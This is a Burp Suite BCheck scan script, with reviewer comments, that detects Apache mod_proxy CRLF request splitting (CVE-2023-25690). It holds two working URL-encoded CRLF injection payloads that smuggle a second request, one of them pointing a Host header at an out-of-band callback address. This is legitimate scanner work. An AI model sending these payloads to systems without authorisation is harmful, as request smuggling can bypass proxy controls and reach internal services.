CVE-2023-25690 Apache mod_proxy CRLF Smuggling
# BCheck for CVE-2023-25690 (Apache mod_proxy request splitting via CRLF in the
# request-target). It sends two probes per audited request and reports:
#   1. a tentative finding when a probe response looks like the proxy accepted the
#      injected request line, and
#   2. a firm finding when the Collaborator host named in the injected Host header
#      receives an HTTP interaction.
metadata:
language: v1-beta
name: "CVE-2023-25690"
description: "Tests for CRLF based HTTP Request Smuggling/Splitting according to CVE-2023-25690"
author: "Peyton Kennedy"
define:
# Both payloads are appended to the request path. URL-decoded, each is:
#   " HTTP/1.1\r\nHost: <host>\r\n\r\nGET /SMUGGLED"
# i.e. an encoded space that ends the original request-target early, followed by
# CRLF-delimited header lines and the start of a second request.
# payload1 uses a loopback Host; payload2 uses a freshly generated Collaborator
# address so that an out-of-band callback can be observed.
injected_payload1 =`%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED`
injected_payload2 =`%20HTTP/1.1%0d%0aHost:%20{generate_collaborator_address()}%0d%0a%0d%0aGET%20/SMUGGLED`
# Per-request check: both probes below are sent for each request this BCheck is run against.
given request then
# Probe 1 ("split"): in-band test with the loopback Host payload.
send request called split:
method: "GET"
appending path: {injected_payload1}
# Probe 2 ("oob"): out-of-band test with the Collaborator Host payload.
send request called oob:
method: "GET"
appending path: {injected_payload2}
# In-band signal: the split response body contains "statusCode":200, OR the latest
# response has status 200.
# NOTE(review): `latest` is evaluated after the `oob` send, so it presumably refers
# to the oob response rather than `split` - confirm this is intended.
# NOTE(review): neither condition is compared against the base response, so a target
# that returns 200 for arbitrary path suffixes would satisfy the status-code branch
# without any splitting taking place. The "tentative" confidence reflects that; a
# comparison with the original response would reduce false positives.
# NOTE(review): the "statusCode":200 body pattern looks tied to one particular
# backend response format - verify against the intended targets.
# NOTE(review): "refrence" in the detail string below is a typo for "reference".
if {split.response.body} matches "\"statusCode\":200" or {latest.response.status_code} is "200" then
report issue:
severity: medium
confidence: tentative
detail: "Apache mod_proxy rules appear to be insecurely splitting requests based on URI path. For more detail, refrence CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if
# Out-of-band signal: an HTTP interaction was recorded for the Collaborator address
# placed in the injected Host header, which is much stronger evidence than the
# in-band heuristic (hence high / firm).
# NOTE(review): only HTTP interactions are checked; a DNS-only lookup of the
# Collaborator host would not be reported by this condition.
# NOTE(review): the remediation text in both findings is generic. mod_proxy ships
# with Apache HTTP Server, so the actionable advice is to move to the fixed httpd
# release named in the Apache advisory for this CVE and to review RewriteRule /
# ProxyPassMatch patterns that re-insert user-supplied request-target data into
# the proxied URL.
if http interactions then
report issue:
severity: high
confidence: firm
detail: "External interaction is detected from an arbitrary host header due to CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if